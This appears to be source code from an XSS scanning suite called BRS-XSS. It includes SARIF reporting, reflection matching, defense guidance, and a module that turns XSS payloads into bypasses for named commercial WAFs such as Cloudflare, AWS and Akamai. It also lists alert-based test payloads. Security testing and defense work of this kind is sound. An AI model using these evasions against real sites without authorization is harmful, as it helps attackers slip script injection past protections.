                        "artifactChanges": [
                            {
                                "artifactLocation": {"uri": self._get_base_url(vuln.url)},
                                "replacements": [
                                    {
                                        "deletedRegion": {"startLine": 1, "startColumn": 1},
                                        "insertedContent": {
                                            "text": f"// TODO: Sanitize parameter '{vuln.parameter}' for {vuln.context_type} context"
                                        },
                                    }
                                ],
                            }
                        ],
                    }
                ],
            }
            # Recommended additional metadata
            result["properties"]["tags"] = ["xss", vuln.vulnerability_type]
            results.append(result)
        return results
    
    def _build_taxonomy(self) -> Dict[str, Any]:
        """Build CWE taxonomy reference"""
        return {
            "name": "CWE",
            "version": "4.12",
            "informationUri": "https://cwe.mitre.org/data/published/cwe_v4.12.pdf/",
            "downloadUri": "https://cwe.mitre.org/data/xml/cwec_v4.12.xml.zip",
            "organization": "MITRE",
            "shortDescription": {
                "text": "The MITRE Common Weakness Enumeration"
            },
            "taxa": [
                {
                    "id": "79",
                    "name": "CWE-79",
                    "shortDescription": {
                        "text": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
                    },
                    "fullDescription": {
                        "text": "The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users."
                    }
                }
            ]
        }
    
    def _get_rule_id(self, vuln: VulnerabilityData) -> str:
        """Determine rule ID based on vulnerability type"""
        if vuln.vulnerability_type == 'stored_xss':
            return "XSS002"
        elif vuln.vulnerability_type == 'dom_xss':
            return "XSS003"
        return "XSS001"  # Default to reflected
    
    def _get_rule_index(self, rule_id: str) -> int:
        """Get rule index for SARIF reference"""
        rule_indices = {"XSS001": 0, "XSS002": 1, "XSS003": 2}
        return rule_indices.get(rule_id, 0)
    
    def _get_severity_level(self, severity: str) -> str:
        """Convert severity to SARIF level"""
        severity_map = {
            "critical": "error",
            "high": "error", 
            "medium": "warning",
            "low": "note",
            "info": "note"
        }
        return severity_map.get(severity.lower(), "warning")
    
    def _get_base_url(self, url: str) -> str:
        """Extract base URL without query parameters"""
        parsed = urlparse(url)
        return f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
    
    def save_sarif(self, vulnerabilities: List[VulnerabilityData], 
                   scan_info: Dict[str, Any], output_path: str) -> None:
        """Save SARIF report to file"""
        sarif_report = self.generate_sarif(vulnerabilities, scan_info)
        # Add run-wide recommended properties
        if sarif_report.get("runs"):
            sarif_report["runs"][0].setdefault("columnKind", "utf16CodeUnits")
            sarif_report["runs"][0].setdefault("defaultEncoding", "utf-8")
        
        with open(output_path, 'w', encoding='utf-8') as f:
            json.dump(sarif_report, f, indent=2, ensure_ascii=False)



#!/usr/bin/env python3

"""
BRS-XSS WAF Evasions

WAF-specific evasion techniques for payload generation.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Modified: Sat 02 Aug 2025 11:25:00 MSK
Telegram: https://t.me/EasyProTech
"""

from typing import List, Any
from .payload_types import GeneratedPayload
from ..utils.logger import Logger

logger = Logger("core.waf_evasions")


class WAFEvasions:
    """WAF-specific evasion techniques"""
    
    def generate_waf_specific_payloads(
        self,
        base_payload: str,
        detected_wafs: List[Any]
    ) -> List[GeneratedPayload]:
        """
        Generate WAF-specific evasion payloads.
        
        Args:
            base_payload: Base payload to modify
            detected_wafs: List of detected WAFs
            
        Returns:
            List of WAF-specific payloads
        """
        evasion_payloads = []
        
        for waf in detected_wafs:
            waf_type = getattr(waf, 'waf_type', None)
            
            if not waf_type:
                continue
            
            waf_variants = []
            
            # Generate evasions based on WAF type
            waf_value = waf_type.value if hasattr(waf_type, 'value') else str(waf_type)
            
            if waf_value == 'cloudflare':
                waf_variants = self.cloudflare_evasions(base_payload)
            elif waf_value == 'aws_waf':
                waf_variants = self.aws_waf_evasions(base_payload)
            elif waf_value == 'incapsula':
                waf_variants = self.incapsula_evasions(base_payload)
            elif waf_value == 'modsecurity':
                waf_variants = self.modsecurity_evasions(base_payload)
            elif waf_value == 'akamai':
                waf_variants = self.akamai_evasions(base_payload)
            elif waf_value == 'barracuda':
                waf_variants = self.barracuda_evasions(base_payload)
            
            # Convert variants to GeneratedPayload objects
            for variant in waf_variants:
                evasion_payloads.append(GeneratedPayload(
                    payload=variant,
                    context_type='unknown',
                    evasion_techniques=[f'{waf_value}_specific'],
                    effectiveness_score=0.8,
                    description=f"{waf_value} specific evasion"
                ))
        
        logger.debug(f"Generated {len(evasion_payloads)} WAF-specific payloads")
        return evasion_payloads
    
    def cloudflare_evasions(self, payload: str) -> List[str]:
        """Cloudflare-specific evasions"""
        evasions = []
        
        # Bypass techniques specific to Cloudflare
        evasions.extend([
            payload.replace('<script>', '<script/x>'),
            payload.replace('<script>', '<script/**/>')
        ])
        
        # Unicode evasions
        if 'alert' in payload:
            evasions.append(payload.replace('alert', 'ale\u0072t'))
        
        # Tag closure manipulation
        if '>' in payload:
            evasions.append(payload.replace('>', '//>'))
        
        # Comment insertion
        if ' ' in payload:
            evasions.append(payload.replace(' ', '/**/'))
        
        # URL encoding of special chars
        evasions.append(
            payload.replace('(', '%28').replace(')', '%29')
        )
        
        # Mixed case with encoding
        mixed_case = payload.replace('script', 'ScRiPt')
        evasions.append(mixed_case.replace('=', '%3d'))
        
        return [e for e in evasions if e != payload]
    
    def aws_waf_evasions(self, payload: str) -> List[str]:
        """AWS WAF-specific evasions"""
        evasions = []
        
        # Hex encoding evasions
        evasions.extend([
            payload.replace('script', 'scr\x69pt'),
            payload.replace('=', '\x3d'),
            payload.replace('<', '\x3c'),
            payload.replace('>', '\x3e')
        ])
        
        # String construction evasions
        if 'alert' in payload:
            evasions.extend([
                payload.replace('alert', 'window["ale"+"rt"]'),
                payload.replace('alert', 'self["ale"+"rt"]'),
                payload.replace('alert', 'top["ale"+"rt"]')
            ])
        
        # Unicode normalization bypass
        evasions.append(payload.replace('script', 'sc\u0072ipt'))
        
        # Null byte insertion (where applicable)
        evasions.append(payload.replace('=', '=\x00'))
        
        return [e for e in evasions if e != payload]
    
    def incapsula_evasions(self, payload: str) -> List[str]:
        """Incapsula-specific evasions"""
        evasions = []
        
        # String concatenation
        if 'alert' in payload:
            evasions.extend([
                payload.replace('alert', 'window["ale"+"rt"]'),
                payload.replace('alert', 'eval("ale"+"rt")')
            ])
        
        # Charset attribute bypass
        if '<script>' in payload:
            evasions.append(payload.replace('<script>', '<script charset="utf-8">'))
        
        # Unicode in event handlers
        if 'onload' in payload:
            evasions.append(payload.replace('onload', 'on\u006coad'))
        
        # URL encoding
        evasions.append(
            payload.replace('(', '%28').replace(')', '%29')
        )
        
        # Case variation with Unicode
        evasions.append(
            payload.replace('onerror', 'onErr\u006fr')
        )
        
        return [e for e in evasions if e != payload]
    
    def modsecurity_evasions(self, payload: str) -> List[str]:
        """ModSecurity-specific evasions"""
        evasions = []
        
        # Whitespace manipulation
        evasions.extend([
            payload.replace(' ', '\t'),
            payload.replace(' ', '\n'),
            payload.replace(' ', '\r')
        ])
        
        # Case variations
        evasions.extend([
            payload.replace('script', 'ScRiPt'),
            payload.replace('alert', 'AlErT'),
            payload.replace('eval', 'EvAl')
        ])
        
        # Null byte insertion
        evasions.append(payload.replace('=', '=\x00'))
        
        # Mixed case pattern
        mixed_case = ''.join([
            c.upper() if i % 2 == 0 else c.lower() 
            for i, c in enumerate(payload)
        ])
        evasions.append(mixed_case)
        
        # Comment insertion
        evasions.append(payload.replace('script', 'scr/**/ipt'))
        
        return [e for e in evasions if e != payload]
    
    def akamai_evasions(self, payload: str) -> List[str]:
        """Akamai-specific evasions"""
        evasions = []
        
        # Double encoding
        evasions.append(
            payload.replace('<', '%253c').replace('>', '%253e')
        )
        
        # UTF-7 encoding (where applicable)
        if '<script>' in payload:
            evasions.append('+ADw-script+AD4-alert(1)+ADw-/script+AD4-')
        
        # Base64 in data URLs
        if 'javascript:' in payload:
            evasions.append(
                payload.replace('javascript:', 'data:text/html;base64,')
            )
        
        # Fragment identifier bypass
        evasions.append(payload + '#')
        
        return [e for e in evasions if e != payload]
    
    def barracuda_evasions(self, payload: str) -> List[str]:
        """Barracuda-specific evasions"""
        evasions = []
        
        # Tab character insertion
        evasions.append(payload.replace(' ', '\t'))
        
        # Form feed character
        evasions.append(payload.replace(' ', '\f'))
        
        # Vertical tab
        evasions.append(payload.replace(' ', '\v'))
        
        # Multiple encoding layers
        double_encoded = payload.replace('<', '%253c')
        evasions.append(double_encoded)
        
        # Case obfuscation
        if 'javascript:' in payload:
            evasions.append(payload.replace('javascript:', 'JaVaScRiPt:'))
        
        return [e for e in evasions if e != payload]


#!/usr/bin/env python3

"""
BRS-XSS Similarity Matcher

String similarity matching for reflection detection.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Modified: Sat 02 Aug 2025 11:25:00 MSK
Telegram: https://t.me/EasyProTech
"""

from typing import List, Tuple
from ..utils.logger import Logger

logger = Logger("core.similarity_matcher")


class SimilarityMatcher:
    """Matches similar strings for reflection detection"""
    
    def __init__(self, threshold: float = 0.8):
        """
        Initialize similarity matcher.
        
        Args:
            threshold: Similarity threshold (0.0-1.0)
        """
        self.threshold = threshold
        
    def find_similar_reflections(
        self,
        needle: str,
        haystack: str,
        min_length: int = 3
    ) -> List[Tuple[int, str, float]]:
        """
        Find similar reflections in content.
        
        Args:
            needle: String to search for
            haystack: Content to search in
            min_length: Minimum match length
            
        Returns:
            List of (position, matched_string, similarity_score)
        """
        if len(needle) < min_length:
            return []
        
        matches = []
        haystack_lower = haystack.lower()
        needle_lower = needle.lower()
        
        # Find exact matches first
        exact_matches = self._find_exact_matches(needle, haystack)
        for pos, match in exact_matches:
            matches.append((pos, match, 1.0))
        
        # Find partial matches
        if not exact_matches:
            partial_matches = self._find_partial_matches(needle_lower, haystack_lower, min_length)
            matches.extend(partial_matches)
        
        # Find fuzzy matches
        if not matches:
            fuzzy_matches = self._find_fuzzy_matches(needle_lower, haystack_lower, min_length)
            matches.extend(fuzzy_matches)
        
        # Filter by threshold and sort by similarity
        filtered_matches = [
            (pos, match, score) for pos, match, score in matches
            if score >= self.threshold
        ]
        
        filtered_matches.sort(key=lambda x: x[2], reverse=True)
        
        return filtered_matches
    
    def _find_exact_matches(self, needle: str, haystack: str) -> List[Tuple[int, str]]:
        """Find exact string matches"""
        matches = []
        start = 0
        
        while True:
            pos = haystack.find(needle, start)
            if pos == -1:
                break
            
            matches.append((pos, needle))
            start = pos + 1
        
        return matches
    
    def _find_partial_matches(
        self,
        needle: str,
        haystack: str,
        min_length: int
    ) -> List[Tuple[int, str, float]]:
        """Find partial string matches"""
        matches = []
        
        # Try different substring lengths
        for length in range(len(needle), min_length - 1, -1):
            for start_pos in range(len(needle) - length + 1):
                substring = needle[start_pos:start_pos + length]
                
                # Find this substring in haystack
                pos = 0
                while True:
                    found_pos = haystack.find(substring, pos)
                    if found_pos == -1:
                        break
                    
                    # Calculate similarity score
                    similarity = length / len(needle)
                    matches.append((found_pos, substring, similarity))
                    
                    pos = found_pos + 1
        
        return matches
    
    def _find_fuzzy_matches(
        self,
        needle: str,
        haystack: str,
        min_length: int
    ) -> List[Tuple[int, str, float]]:
        """Find fuzzy string matches using sliding window"""
        matches = []
        needle_len = len(needle)
        
        # Try different window sizes
        for window_size in range(min(needle_len + 10, len(haystack)), min_length - 1, -1):
            for i in range(len(haystack) - window_size + 1):
                window = haystack[i:i + window_size]
                similarity = self._calculate_similarity(needle, window)
                
                if similarity >= self.threshold:
                    matches.append((i, window, similarity))
        
        return matches
    
    def _calculate_similarity(self, str1: str, str2: str) -> float:
        """Calculate similarity between two strings"""
        if not str1 or not str2:
            return 0.0
        
        if str1 == str2:
            return 1.0
        
        # Use Levenshtein distance for similarity
        distance = self._levenshtein_distance(str1, str2)
        max_len = max(len(str1), len(str2))
        
        return 1.0 - (distance / max_len) if max_len > 0 else 0.0
    
    def _levenshtein_distance(self, str1: str, str2: str) -> int:
        """Calculate Levenshtein distance between two strings"""
        if len(str1) < len(str2):
            return self._levenshtein_distance(str2, str1)
        
        if len(str2) == 0:
            return len(str1)
        
        previous_row = list(range(len(str2) + 1))
        
        for i, char1 in enumerate(str1):
            current_row = [i + 1]
            
            for j, char2 in enumerate(str2):
                # Cost of insertions, deletions, or substitutions
                insertions = previous_row[j + 1] + 1
                deletions = current_row[j] + 1
                substitutions = previous_row[j] + (char1 != char2)
                
                current_row.append(min(insertions, deletions, substitutions))
            
            previous_row = current_row
        
        return previous_row[-1]
    
    def find_encoded_reflections(
        self,
        needle: str,
        haystack: str
    ) -> List[Tuple[int, str, str]]:
        """
        Find encoded reflections of the needle in haystack.
        
        Returns:
            List of (position, encoded_string, encoding_type)
        """
        encoded_matches = []
        
        # Common encoding patterns
        encodings = {
            'html_entities': self._html_entity_encode,
            'url_encoding': self._url_encode,
            'unicode_escape': self._unicode_escape,
            'hex_escape': self._hex_escape
        }
        
        for encoding_name, encoding_func in encodings.items():
            try:
                encoded_needle = encoding_func(needle)
                exact_matches = self._find_exact_matches(encoded_needle, haystack)
                
                for pos, match in exact_matches:
                    encoded_matches.append((pos, match, encoding_name))
                    
            except Exception as e:
                logger.debug(f"Encoding {encoding_name} failed: {e}")
                continue
        
        return encoded_matches
    
    def _html_entity_encode(self, text: str) -> str:
        """HTML entity encode text"""
        entities = {
            '<': '&lt;',
            '>': '&gt;',
            '"': '&quot;',
            "'": '&#x27;',
            '&': '&amp;'
        }
        
        encoded = text
        for char, entity in entities.items():
            encoded = encoded.replace(char, entity)
        
        return encoded
    
    def _url_encode(self, text: str) -> str:
        """URL encode text"""
        import urllib.parse
        return urllib.parse.quote(text)
    
    def _unicode_escape(self, text: str) -> str:
        """Unicode escape text"""
        return text.encode('unicode_escape').decode('ascii')
    
    def _hex_escape(self, text: str) -> str:
        """Hex escape text"""
        return ''.join(f'\\x{ord(c):02x}' for c in text)
    
    def calculate_reflection_quality(
        self,
        original: str,
        reflected: str
    ) -> dict:
        """
        Calculate reflection quality metrics.
        
        Returns:
            Dictionary with quality metrics
        """
        if not original or not reflected:
            return {
                'similarity': 0.0,
                'completeness': 0.0,
                'accuracy': 0.0,
                'char_preservation': 0.0
            }
        
        # Overall similarity
        similarity = self._calculate_similarity(original, reflected)
        
        # Completeness (how much of original is in reflected)
        completeness = len(reflected) / len(original) if len(original) > 0 else 0.0
        completeness = min(completeness, 1.0)  # Cap at 1.0
        
        # Accuracy (how accurate the reflection is)
        accuracy = similarity
        
        # Character preservation
        original_chars = set(original.lower())
        reflected_chars = set(reflected.lower())
        common_chars = original_chars.intersection(reflected_chars)
        char_preservation = len(common_chars) / len(original_chars) if original_chars else 0.0
        
        return {
            'similarity': similarity,
            'completeness': completeness,
            'accuracy': accuracy,
            'char_preservation': char_preservation
        }


#!/usr/bin/env python3

"""
Project: BRS-XSS (XSS Detection Suite)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: Fri 10 Oct 2025 13:11:55 UTC
Status: Modified
Telegram: https://t.me/EasyProTech
"""

from typing import Dict, Any, Optional
from ..utils.logger import Logger
from .config_manager import ConfigManager

logger = Logger("core.impact_calculator")


class ImpactCalculator:
    """Calculates the potential impact of an XSS vulnerability based on the payload."""
    
    def __init__(self, config: Optional[ConfigManager] = None):
        """Initialize impact calculator"""
        self.config = config or ConfigManager()
        self.impact_scores = self.config.get('scoring.impact_functions', {
            '<script': 0.9,
            'document.cookie': 0.9,
            'eval(': 0.8,
            'document.write': 0.7,
            'location.href': 0.6,
            'XMLHttpRequest': 0.8,
            'fetch(': 0.8,
            'alert(': 0.3, # Lower impact, but a good indicator
            'prompt(': 0.4,
            'confirm(': 0.4
        })

    def calculate_impact_score(self, context_info: Dict[str, Any], payload: str) -> float:
        """
        Calculate impact score (0-1.0) based purely on the payload's contents.
        """
        base_score = 0.0
        payload_lower = payload.lower()

        for func, score in self.impact_scores.items():
            if func in payload_lower:
                base_score = max(base_score, score)
        
        # The context bonus is removed to keep this calculator focused *only* on the payload.
        # Context is handled by the ContextCalculator.

        logger.debug(f"Impact score calculated: {base_score:.2f}")
        return base_score


#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10 17:31:53 UTC+3
Status: Refactored
Telegram: https://t.me/easyprotech

JavaScript Context - Remediation
"""

REMEDIATION = """
DEFENSE-IN-DEPTH STRATEGY:

1. NEVER PLACE UNTRUSTED INPUT IN JAVASCRIPT CONTEXT:
   
   This is the PRIMARY rule. Violation leads to immediate RCE.
   
   BAD (Never do this):
   <script>
   var userId = <?php echo $user_id ?>;
   var username = <?php echo $username ?>;
   var config = {value: <?= $user_data ?>};
   </script>

2. USE DATA ATTRIBUTES (Recommended Approach):
   
   HTML (Server-side):
   <div id="app-data" 
        data-user-id="<?php echo htmlspecialchars($user_id) ?>"
        data-username="<?php echo htmlspecialchars($username) ?>">
   </div>
   
   JavaScript (Client-side):
   <script>
   const appData = document.getElementById('app-data');
   const userId = appData.dataset.userId; // Safe!
   const username = appData.dataset.username; // Safe!
   </script>

3. JSON SERIALIZATION WITH PROPER ESCAPING:
   
   Python (Flask/Django):
   import json
   <script>
   var config = {{ config_data|tojson|safe }};
   </script>
   
   Or better:
   <script>
   var config = JSON.parse('{{ config_data|tojson }}');
   </script>
   
   PHP:
   <script>
   var config = <?php echo json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT); ?>;
   </script>
   
   Node.js:
   const serialize = require('serialize-javascript');
   <script>
   var config = <%= serialize(data) %>;
   </script>

4. USE SCRIPT TYPE='APPLICATION/JSON':
   
   HTML:
   <script type="application/json" id="app-config">
   <?php echo json_encode($config, JSON_HEX_TAG | JSON_HEX_AMP); ?>
   </script>
   
   <script>
   // Parse safely
   const configElement = document.getElementById('app-config');
   const config = JSON.parse(configElement.textContent);
   </script>
   
   This prevents execution even if malicious content is injected.

5. CONTENT SECURITY POLICY (CSP):
   
   Strict CSP (Blocks inline scripts):
   Content-Security-Policy: 
     default-src 'self';
     script-src 'self' 'nonce-RANDOM123';
     object-src 'none';
   
   HTML:
   <script nonce="RANDOM123">
   // Only scripts with matching nonce execute
   var config = getConfigSafely();
   </script>
   
   With strict-dynamic (Better):
   Content-Security-Policy:
     script-src 'nonce-RANDOM123' 'strict-dynamic';
   
   Blocks eval() and Function():
   Content-Security-Policy:
     script-src 'self' 'unsafe-inline'; // Without 'unsafe-eval'

6. TRUSTED TYPES API (Modern Browsers):
   
   Policy:
   Content-Security-Policy: require-trusted-types-for 'script'
   
   JavaScript:
   if (window.trustedTypes && trustedTypes.createPolicy) {
       const policy = trustedTypes.createPolicy('default', {
           createScript: (input) => {
               // Validate and sanitize
               if (isSafe(input)) {
                   return input;
               }
               throw new TypeError('Unsafe script');
           }
       });
   }
   
   This prevents:
   - eval() with untrusted strings
   - Function() constructor
   - innerHTML with <script>
   - javascript: URLs

7. AVOID DANGEROUS APIS:
   
   NEVER USE WITH USER INPUT:
   - eval(userInput)
   - new Function(userInput)
   - setTimeout(userInput, 1000) // String form
   - setInterval(userInput, 1000) // String form
   - element.innerHTML = '<script>' + userInput + '</script>'
   - document.write(userInput)
   - document.writeln(userInput)
   
   USE SAFE ALTERNATIVES:
   - JSON.parse(userInput) // With try/catch
   - setTimeout(() => safeFunction(userInput), 1000) // Function form
   - element.textContent = userInput

8. JSONP VALIDATION:
   
   Strict callback validation:
   
   Python:
   import re
   
   CALLBACK_PATTERN = re.compile(r'^[a-zA-Z_$][a-zA-Z0-9_$]*$')
   
   if not CALLBACK_PATTERN.match(callback):
       return jsonify({"error": "Invalid callback"}), 400
   
   PHP:
   if (!preg_match('/^[a-zA-Z_$][a-zA-Z0-9_$]*$/', $callback)) {
       die('Invalid callback');
   }
   
   Or better: DON'T USE JSONP - use CORS instead:
   Access-Control-Allow-Origin: https://trusted-domain.com

9. SERVER-SIDE RENDERING (SSR) PROTECTION:
   
   React (Next.js):
   // Use getServerSideProps
   export async function getServerSideProps(context) {
       const data = await fetchData();
       return {
           props: {
               data: data // Automatically serialized safely
           }
       };
   }
   
   Vue (Nuxt.js):
   export default {
       async asyncData({ params }) {
           const data = await fetchData();
           return { data }; // Safely serialized
       }
   }
   
   Angular Universal:
   // Uses TransferState for safe serialization

10. INPUT VALIDATION:
    
    For numeric IDs:
    $user_id = intval($_GET['id']);
    if ($user_id <= 0) die('Invalid ID');
    
    For enums:
    $allowed = ['en', 'es', 'fr', 'de'];
    if (!in_array($lang, $allowed)) $lang = 'en';
    
    For JSON:
    try {
        $data = json_decode($input, true, 512, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        die('Invalid JSON');
    }

SECURITY CHECKLIST:

[ ] No user input placed directly in <script> tags
[ ] All data passed via data attributes or JSON in <script type="application/json">
[ ] JSON serialization uses proper flags (JSON_HEX_TAG, etc.)
[ ] CSP configured to block 'unsafe-eval' and inline scripts without nonces
[ ] Trusted Types API enabled (modern browsers)
[ ] No eval(), Function(), setTimeout/setInterval with strings
[ ] JSONP callbacks validated with strict regex (or JSONP avoided entirely)
[ ] SSR frameworks configured for safe serialization
[ ] All numeric inputs validated and cast to int
[ ] All enum inputs validated against whitelist
[ ] Code review for all server-side JavaScript generation
[ ] Regular security testing with focus on script injection
[ ] Developer training on JavaScript context XSS

TESTING PAYLOADS:

Basic injection:
1; alert(1); var x=1

Template literal:
${alert(1)}

Object breakout:
1, exploit: alert(1), real: 1

Array breakout:
1]; alert(1); var x=[1

Comment abuse:
1; alert(1)//
1; alert(1)/**/

JSONP:
alert
eval(atob('YWxlcnQoMSk='))

OWASP REFERENCES:
- OWASP XSS Prevention Cheat Sheet: Rule #3
- CWE-79: Improper Neutralization of Input During Web Page Generation
- Content Security Policy Level 3
- Trusted Types API Specification
- OWASP Testing Guide: Testing for JavaScript Execution
"""




#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10
Status: Created
Telegram: https://t.me/easyprotech

Reverse Mapping System: Payload → Context → Defense
"""

from typing import List, Dict

# Payload → Context mapping
PAYLOAD_TO_CONTEXT = {
    "<script>alert(1)</script>": {
        "contexts": ["html_content", "html_comment", "svg_context"],
        "severity": "critical",
        "defenses": ["html_encoding", "csp", "sanitization"]
    },
    "<img src=x onerror=alert(1)>": {
        "contexts": ["html_content", "markdown_context", "xml_content"],
        "severity": "high",
        "defenses": ["html_encoding", "attribute_sanitization", "csp"]
    },
    "javascript:alert(1)": {
        "contexts": ["url_context", "html_attribute"],
        "severity": "high",
        "defenses": ["url_validation", "protocol_whitelist"]
    },
    "{{constructor.constructor('alert(1)')()}}": {
        "contexts": ["template_injection"],
        "severity": "critical",
        "defenses": ["template_sandboxing", "aot_compilation", "csp"]
    },
    "'; alert(1); var x='": {
        "contexts": ["js_string"],
        "severity": "critical",
        "defenses": ["javascript_encoding", "json_serialization", "csp"]
    },
    "<svg onload=alert(1)>": {
        "contexts": ["svg_context", "html_content"],
        "severity": "high",
        "defenses": ["svg_sanitization", "csp", "content_type_headers"]
    }
}

# Defense → Effectiveness mapping
DEFENSE_TO_EFFECTIVENESS = {
    "html_encoding": {
        "effective_against": [
            "html_content", "html_attribute", "html_comment"
        ],
        "implementation": [
            "htmlspecialchars($input, ENT_QUOTES, 'UTF-8')",  # PHP
            "html.escape(input, quote=True)",  # Python
            "element.textContent = input"  # JavaScript
        ],
        "bypass_difficulty": "high"
    },
    "csp": {
        "effective_against": [
            "html_content", "javascript_context", "css_context", 
            "svg_context", "template_injection"
        ],
        "implementation": [
            "Content-Security-Policy: default-src 'self'; script-src 'nonce-random'"
        ],
        "bypass_difficulty": "very_high"
    },
    "javascript_encoding": {
        "effective_against": ["js_string", "javascript_context"],
        "implementation": [
            "JSON.stringify(input)",
            "json.dumps(input)",
            "json_encode($input, JSON_HEX_TAG)"
        ],
        "bypass_difficulty": "high"
    },
    "url_validation": {
        "effective_against": ["url_context"],
        "implementation": [
            "new URL(input, base)",  # JavaScript
            "urllib.parse.urlparse(input)",  # Python
            "parse_url($input)"  # PHP
        ],
        "bypass_difficulty": "medium"
    },
    "sanitization": {
        "effective_against": [
            "html_content", "svg_context", "markdown_context", "xml_content"
        ],
        "implementation": [
            "DOMPurify.sanitize(input)",  # JavaScript
            "bleach.clean(input)",  # Python
            "HTMLPurifier"  # PHP
        ],
        "bypass_difficulty": "medium"
    }
}

# Context → Recommended defenses
CONTEXT_TO_DEFENSES = {
    "html_content": [
        {"defense": "html_encoding", "priority": 1, "required": True},
        {"defense": "csp", "priority": 1, "required": True},
        {"defense": "sanitization", "priority": 2, "required": False}
    ],
    "html_attribute": [
        {"defense": "html_encoding", "priority": 1, "required": True},
        {"defense": "url_validation", "priority": 1, "required": True},
        {"defense": "csp", "priority": 2, "required": True}
    ],
    "javascript_context": [
        {"defense": "avoid_inline_js", "priority": 1, "required": True},
        {"defense": "json_serialization", "priority": 1, "required": True},
        {"defense": "csp", "priority": 1, "required": True}
    ],
    "js_string": [
        {"defense": "javascript_encoding", "priority": 1, "required": True},
        {"defense": "json_serialization", "priority": 1, "required": True},
        {"defense": "csp", "priority": 2, "required": True}
    ],
    "url_context": [
        {"defense": "url_validation", "priority": 1, "required": True},
        {"defense": "protocol_whitelist", "priority": 1, "required": True},
        {"defense": "csp", "priority": 2, "required": True}
    ]
}


def find_contexts_for_payload(payload: str) -> Dict:
    """Find contexts where payload is effective"""
    return PAYLOAD_TO_CONTEXT.get(payload, {
        "contexts": [],
        "severity": "unknown",
        "defenses": []
    })


def get_defenses_for_context(context: str) -> List[Dict]:
    """Get recommended defenses for a context"""
    return CONTEXT_TO_DEFENSES.get(context, [])


def get_defense_info(defense: str) -> Dict:
    """Get detailed information about a defense mechanism"""
    return DEFENSE_TO_EFFECTIVENESS.get(defense, {})


def find_payload_bypasses(payload: str) -> List[str]:
    """Find contexts where payload might be blocked"""
    info = find_contexts_for_payload(payload)
    return info.get("defenses", [])


def reverse_lookup(query_type: str, query: str) -> Dict:
    """
    Universal reverse lookup function
    
    query_type: 'payload', 'context', 'defense'
    query: the actual query string
    """
    if query_type == 'payload':
        return find_contexts_for_payload(query)
    elif query_type == 'context':
        return {
            "defenses": get_defenses_for_context(query),
            "context": query
        }
    elif query_type == 'defense':
        return get_defense_info(query)
    else:
        return {}


# Export all functions
__all__ = [
    'find_contexts_for_payload',
    'get_defenses_for_context',
    'get_defense_info',
    'find_payload_bypasses',
    'reverse_lookup',
    'PAYLOAD_TO_CONTEXT',
    'DEFENSE_TO_EFFECTIVENESS',
    'CONTEXT_TO_DEFENSES'
]




#!/usr/bin/env python3

"""
BRS-XSS DOM Vulnerability Types

Enumerations for DOM XSS vulnerability types and risk levels.

Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Modified: Sat 02 Aug 2025 09:35:54 MSK
Telegram: https://t.me/EasyProTech
"""

from enum import Enum


class VulnerabilityType(Enum):
    """DOM XSS vulnerability types"""
    DIRECT_ASSIGNMENT = "direct_assignment"           # Direct assignment
    FUNCTION_PARAMETER = "function_parameter"         # Through function parameter
    PROPERTY_INJECTION = "property_injection"         # Property injection
    EVENT_HANDLER = "event_handler"                   # Event handler injection
    URL_MANIPULATION = "url_manipulation"             # URL manipulation
    POSTMESSAGE_XSS = "postmessage_xss"              # PostMessage XSS
    WEBSOCKET_XSS = "websocket_xss"                  # WebSocket XSS
    STORAGE_XSS = "storage_xss"                      # localStorage/sessionStorage XSS
    TEMPLATE_INJECTION = "template_injection"         # Template injection
    JSON_INJECTION = "json_injection"                # JSON injection


class RiskLevel(Enum):
    """Risk levels"""
    CRITICAL = "critical"     # Critical
    HIGH = "high"            # High  
    MEDIUM = "medium"        # Medium
    LOW = "low"             # Low
    INFO = "info"           # Informational


#!/usr/bin/env python3

"""
Project: BRS-XSS Knowledge Base Manager
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: Fri 10 Oct 2025 15:35:00 MSK
Status: Modified
Telegram: https://t.me/EasyProTech
"""

import os
import importlib
from typing import Dict, Any, List

# --- Version Information ---
KB_VERSION = "1.0.0"
KB_BUILD = "2025.10.10"
KB_REVISION = "stable"
KB_MODULES_COUNT = 17

# --- Private variables ---
_KNOWLEDGE_BASE: Dict[str, Dict[str, str]] = {}
_initialized = False

# --- Private functions ---
def _initialize_knowledge_base():
    """Dynamically load all vulnerability details from this directory."""
    global _KNOWLEDGE_BASE, _initialized
    if _initialized:
        return

    current_dir = os.path.dirname(__file__)
    
    for item in os.listdir(current_dir):
        item_path = os.path.join(current_dir, item)
        
        # Handle both .py files and directories
        if item.endswith('.py') and not item.startswith('__'):
            module_name = item[:-3]
        elif os.path.isdir(item_path) and not item.startswith('__'):
            # Directory-based module (e.g., css_context/)
            module_name = item
        else:
            continue
        
        try:
            module = importlib.import_module(f".{module_name}", package=__name__)
            if hasattr(module, 'DETAILS'):
                # The key for the dictionary is the module name
                _KNOWLEDGE_BASE[module_name] = module.DETAILS
        except ImportError:
            # Handle potential import errors gracefully
            continue
    
    _initialized = True

# --- Public API ---
def get_vulnerability_details(context: str) -> Dict[str, str]:
    """
    Retrieves the title, description, attack vector, and remediation
    for a given vulnerability context.
    """
    _initialize_knowledge_base()
    
    context = context.lower()
    return _KNOWLEDGE_BASE.get(context, _KNOWLEDGE_BASE.get("default", {}))

# --- Public API Extensions ---
def get_kb_version() -> str:
    """Get Knowledge Base version."""
    return KB_VERSION

def get_kb_info() -> Dict[str, Any]:
    """Get KB information."""
    _initialize_knowledge_base()
    return {
        "version": KB_VERSION,
        "build": KB_BUILD,
        "revision": KB_REVISION,
        "total_contexts": len(_KNOWLEDGE_BASE),
        "available_contexts": list(_KNOWLEDGE_BASE.keys())
    }

def list_contexts() -> List[str]:
    """List all available contexts."""
    _initialize_knowledge_base()
